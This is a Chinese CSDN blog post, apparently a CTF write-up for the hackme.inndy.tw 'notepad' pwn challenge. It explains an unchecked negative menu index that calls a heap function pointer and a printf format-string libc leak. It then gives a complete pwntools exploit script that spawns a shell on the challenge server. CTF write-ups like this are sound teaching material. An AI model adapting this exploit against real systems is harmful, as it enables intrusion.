notepad的wp

最新推荐文章于 2024-06-16 09:06:04 发布
最新推荐文章于 2024-06-16 09:06:04 发布
阅读量1.6k 收藏
点赞数
分类专栏: ctf的wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/78768850
版权

https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了notepad这个题目感觉还不错,我把wp分享出来,方便大家学习
very_overflow的题目要求是: 

nc hackme.inndy.tw 7713

把notepad直接拖入ida中:
main函数:
image
menu函数:
image
bash函数:
image
cmd函数:
image
rstrip函数:
image
notepad函数:
image
notepad_new函数:
image
notepad_open函数:
image
notepad_delete函数:
image
notepad_rdonly函数:
image
notepad_keepsec函数:
image
这个程序初看很复杂,函数很多,功能也很多,但是还是逃不出ctf的一些出题套路,可以参考这个问题: http://www.cnblogs.com/Ox9A82/p/5559167.html ,所以主要的漏洞点会出在notepad_open的编辑功能中
先运行一下程序看一下这个程序干了啥
image
再看看程序开启了哪些保护:
image
这个题目开了栈不可执行和canary保护,所以不可能是栈溢出
这个题目在创建一个notepad的时候会把数据和函数指针一起放入堆中,这个题目的漏洞点在notepad_open调用的menu函数中,因为notepad_open会根据你在菜单中选择的项目调用堆中指定的函数,因为menu函数只限制了选择的上限,没有限制选择的下限,所以可以让menu函数的返回结果为负数,这样调用的函数指针会指向上一块内存中的数据,也就是你可以控制的content的数据
而泄露libc基地址的方法是,第一次调用strncpy函数
image
目的是利用strncpy这个函数把0xfff2c9f4中的数据复制到0xfff2c9f0中去
然后再调用printf函数
image
这样就可以利用printf函数来泄露栈中任意数据了
然后再利用函数的编辑功能把第一块堆中的数据改成MAGIC_addr,最后再利用一次notepad_open函数就可以getshell了
我的exp是: 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

localMAGIC = 0x3ac5c      #locallibc
remoteMAGIC = 0x3ac3e      #remotelibc   #libc6_2.23-0ubuntu3_i386.so

def debug(addr = '0x8048ce8'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)

def base_addr(prog_addr,offset):
    return eval(prog_addr)-offset

elf = ELF('/home/h11p/hackme/notepad')
printf_addr=elf.plt['printf']
print 'printf_addr:'+hex(printf_addr)
strncpy_addr=elf.plt['strncpy']
print 'strncpy_addr:'+hex(strncpy_addr)
printf_got_addr=elf.got['printf']
print 'printf_got_addr:'+hex(printf_got_addr)

#io = process('/home/h11p/hackme/notepad')
io = remote('hackme.inndy.tw', 7713)


payload1='a'*4+p32(printf_addr)+p32(strncpy_addr)+'a'*3

#debug()
io.recvuntil('::> ')
io.sendline('c')
io.recvuntil('::>')
io.sendline('a')
io.recvuntil('size > ')
io.sendline('16')
io.recvuntil('data > ')
io.send(payload1)

io.recvuntil('::> ')
io.sendline('a')
io.recvuntil('size > ')
io.sendline('16')
io.recvuntil('data > ')
io.send('a'*15)

io.recvuntil('::> ')
io.sendline('b')
io.recvuntil('id > ')
io.sendline('1')
io.recvuntil('edit (Y/n)')
io.sendline(p32(0x59))
io.recvuntil('content > ')
io.sendline('%1067$p')
io.recvuntil('::> ')
io.sendline(p32(93))


io.recvuntil('::> ')
io.sendline('b')
io.recvuntil('id > ')
io.sendline('1')
io.recvuntil('::> ')
io.sendline(p32(92))
libc_start_main_247=io.recv().splitlines()[0]
libc_start_main=base_addr(libc_start_main_247,0xf7)
print "libc_start_main:"+hex(libc_start_main)

#local_libc_base=base_addr(libc_start_main_247,0x18637)
#print "libc_base:"+hex(local_libc_base)

remote_libc_base=base_addr(libc_start_main_247,0x18637)
print "libc_base:"+hex(remote_libc_base)


#MAGIC_addr=local_libc_base+localMAGIC
MAGIC_addr=remote_libc_base+remoteMAGIC
payload2=p32(MAGIC_addr)
print "MAGIC_addr:"+hex(MAGIC_addr)
#io.recv()
io.sendline('b')
io.recvuntil('id > ')
io.sendline('0')
io.recvuntil('edit (Y/n)')
io.sendline('Y')
io.recvuntil('content > ')
io.sendline(payload2)
io.recvuntil('::> ')
io.sendline('a')

io.recvuntil('::> ')
io.sendline('b')
io.recvuntil('id > ')
io.sendline('1')
io.recvuntil('::> ')
io.sendline(p32(91))

io.interactive()
io.close()

效果是:
image

niexinming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WP主题:HotNewspro 2.4
10-05
提示:如果你对修改模板基本要求一无所知,请在后台主题编辑功能中修改,或者使用Notepad++文本编辑软件,否则可能会造成错位或乱码。 分类ID查看方法:进入后台→文章→分类目录,把鼠标悬停在某个分类名称上,...
Notepad++ wordpress 编写软件
05-04
5. **快速编辑配置文件**:如wp-config.php,进行数据库连接设置和其他高级配置。 使用Notepad++时,需要注意的是,由于它是本地编辑器,所以需要通过FTP或SFTP工具(如NppFTP插件)与远程服务器进行文件同步。此外...
Notepad++使用技法
gongpeng1966的专栏
04-01 1239
TextFX,Function List,JSMin,JSLint,Light Explorer,Npp Export,JSON Viewer   Alt+H  隐藏行 Ctrl+Tab  实现在多个打开的窗口间切换 Ctrl+Shift+Q区块注释 Ctrl+K行注释(取消Ctrl+Shift+K) 文件 新建文件 Ctrl+N 打开文件 Ctrl+O
Notepad-- 轻量级文本编辑器的安装及基本使用
jks212454的博客
10-28 4万+
Notepad-- 轻量级文本编辑器的安装及基本使用
工具:nodepad++使用总结
最新发布
xiaobaiPlayGame的专栏
06-16 294
在日常的开发过程中nodepad++的使用总结
Notepad++ 下载与安装教程(非常详细),从零基础入门到精通,看完这一篇就够了(附安装包)
热门推荐
xnxqwzy的博客
08-13 27万+
软件:Notepad++版本:7.7语言:简体中文大小:3.98M安装环境:Win11/Win10/Win8/Win7硬件要求:CPU@2.0GHz 内存@4G(或更高)下载通道①百度网盘丨64位下载链接:[提取码]:kwii下载通道①百度网盘丨32位下载链接:提取码:7kmi。
Notepad++--编辑的技巧
IT利刃出鞘的博客
07-04 698
本文介绍Notepad++编辑的技巧。
WP本地建站后上传详解
09-04
- 打开.sql文件,使用文本编辑器(如Notepad++)搜索并替换所有本地URL路径为新服务器的URL。 - 在新服务器上,通过PHPMyAdmin导入该.sql文件到新创建的数据库中。确保新数据库的语言和字符集与原数据库一致。 3....
WP主题:HotNewspro 2.72
10-05
■ 主题大部分功能可在主题设置中加以控制,但另有少部分功能,需手动修改模版文件才能正常使用,所以建议使用notepad++或EmEditor文本编辑 软件修改模版后,通过FTP软件上传覆盖原文件,或者在Wordpress后台外观→...
防红专用 QQ微信打开提示跳转浏览器的代码
12-17
使用方法: ...批量替换(可用notepad++等软件进行批量修改): 使用说明: 手机QQ内打开会自动跳转浏览器; 手机微信内打开需用用户手动跳转; 用户可选择对应浏览器; 用户可手动复制网站地址;
Notepad++主题
05-06
大量Notepad++主题,纯个人转换,欢迎分享。使用方法:设置==>导入==>导入主题==>选择||设置==>语言格式设置==>选择主题==>选择==>保存并关闭
基于NotePad应用的功能扩展
douzajun的博客
08-29 3064
基于NotePad应用的功能扩展原应用展示图1:NotePad主界面图2:新建笔记图3:新建笔记退回主页面图4:进入笔记,编辑标题菜单图5:编辑标题图6:笔记列表图7:长点“第二条笔记”,菜单 拓展功能 NoteList中显示条目增加时间显示 笔记查询(按标题查询) UI美化 背景更换 导出笔记 笔记排序 拓展应用源码源码: NotePad拓展功能解析 NoteList中显示条目增加时间显示 在No
npp php,Notepad++ Home下载,NPP官方下载
weixin_30981569的博客
03-23 2032
也有人把这一款编辑加叫青蛙Notepad++ 是一款非常有特色的功能有:①、内置支持多达 27 种语法高亮度显示(囊括各种常见的源代码、脚本,值得一提的是,完美支持 .nfo 文件查看),也支持自定义语言;②、可自动检测文件类型,根据关键字显示节点,节点可自由折叠/打开,代码显示得非常有层次感!这是此软件最具特色的体现之一;③、可打开双窗口,在分窗口中又可打开多个子窗口,允许快捷切换全屏显示模式(...
文本编辑器Notepad++使用技巧
YHJ
06-13 3万+
除了语法高亮,一般不用操作。还有两点经常使用的:正则表达式查找替换和列模式编辑。这些可以在VS、Eclipse、Word等里也有,但是有时打开一个文件就慢了。 本来想总结记录一下技巧的,却无意中发现已经有人写过了,而且详细的一p。 详见这里: 3.4. Notepad++的正则表达式替换和替换 3.6. Notepad++的列编辑功能 文章使用的是Word上传的,上传后排版不一样了。。。 以下是摘录。 【crifan推荐】轻量级文本编辑器,Notepad最佳替代品:Notepa...
Notepad++使用技巧
雪狼人的宿命
07-28 4495
Notepad++使用技巧
Notepad ++ 安装与配置
weixin_53928448的博客
07-03 3万+
Notepad ++ 获取与安装 Notepad ++ 是什么 获取 Notepad ++ 官方安装包 安装 Notepad ++ 可以很方便的转换编码 配置 Notepad ++ 首选项 常用 编辑 暗黑模式 高亮 自动完成 其她
正确打开db文件的方式,避免乱码和无意义内容
haoranhaoshi的博客
11-28 15万+
db文件如果用记事本或者Notepad++打开,会显示乱码,改变编码不能解决问题,如果用UltraEdit打开,可以看到进制数据,但是无意义的。 正确的方法有两种: (1)用sqlitespy打开,下载网址为:https://www.yunqa.de/delphi/products/sqlitespy/index,而且是免安装的版本,它是一款类似Navicat的工具,轻巧易用,可以查看扩展名为sq...
hackme inndy pwn notepad writeup
charlie_heng的专栏
01-03 414
做完这题就剩下最后一题了。。。。 这题其实还是有点难度的 先说下这题的漏洞在哪里 在notepad_open这个函数里面,读取要执行哪一个函数的时候,没有验证范围,所以可以输入比a小的字符,执行上一个堆里的某个指针 但是有了这个漏洞,怎么利用呢?参数只能是当前堆 想了半天,终于想出来了 先new 4个small bin,然后用这个漏洞free掉第三个堆,再用它给的delete not...
Notepad++插件提升编程效率技巧
"这篇资源主要介绍了Notepad++的使用技巧,包括如何利用Notepad++进行代码编辑、常用快捷键操作,以及推荐的一些实用插件,旨在帮助用户提高编写代码的效率。" Notepad++是一款非常受欢迎的免费源代码编辑器,尤其...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值